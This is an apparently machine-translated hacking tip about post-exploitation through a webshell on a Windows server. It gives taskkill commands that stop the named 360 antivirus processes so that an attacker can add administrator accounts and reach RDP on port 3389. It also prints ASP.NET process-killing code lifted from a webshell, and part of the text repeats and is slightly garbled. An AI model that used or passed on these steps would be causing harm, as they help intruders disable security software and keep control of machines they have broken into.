Webshell has the system permission and cannot add administrators. In the end, it cannot connect to 3389 successfully. This is generally caused by anti-virus software. To solve this problem, first view the process: tasklist and then kill the process: taskkill/im process name .exe/f these are 360 processes: 360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe and then turn off 360 active defense. Method: the particularity of Apache + PHP in Windows, as a result, many webshells on the php site have SYSTEM permissions, so it is easy to end 360. Even if it is not a SYSTEM, there is a way. For example, ASPX and asp.net have a process manipulation function. Look at the code (pulled directly from webshell): the special nature of Apache + PHP in Windows has led many webshells on the php site to have SYSTEM permissions, so it is easy to end 360. Even if it is not a SYSTEM, there is a way. For example, ASPX and asp.net have a process manipulation function. View the code (pulled directly from webshell): protected void kp_Click (object sender, EventArgs e) {Process [] kp = Process. getProcesses (); foreach (Process kp1 in kp) if (kp1.ProcessName = ListBox1.SelectedValue. toString () {try {kp1.Kill (); Response. write ("<script> alert ('killed'); location. href = '? '</"+" Script> "); ListBox1.Items. clear ();} catch (Exception x) {Response. write (x. message. toString (); Response. end ();} www.2cto.com} This kill () function of asp.net can easily kill 360 even in the IIS + ASPX users user group.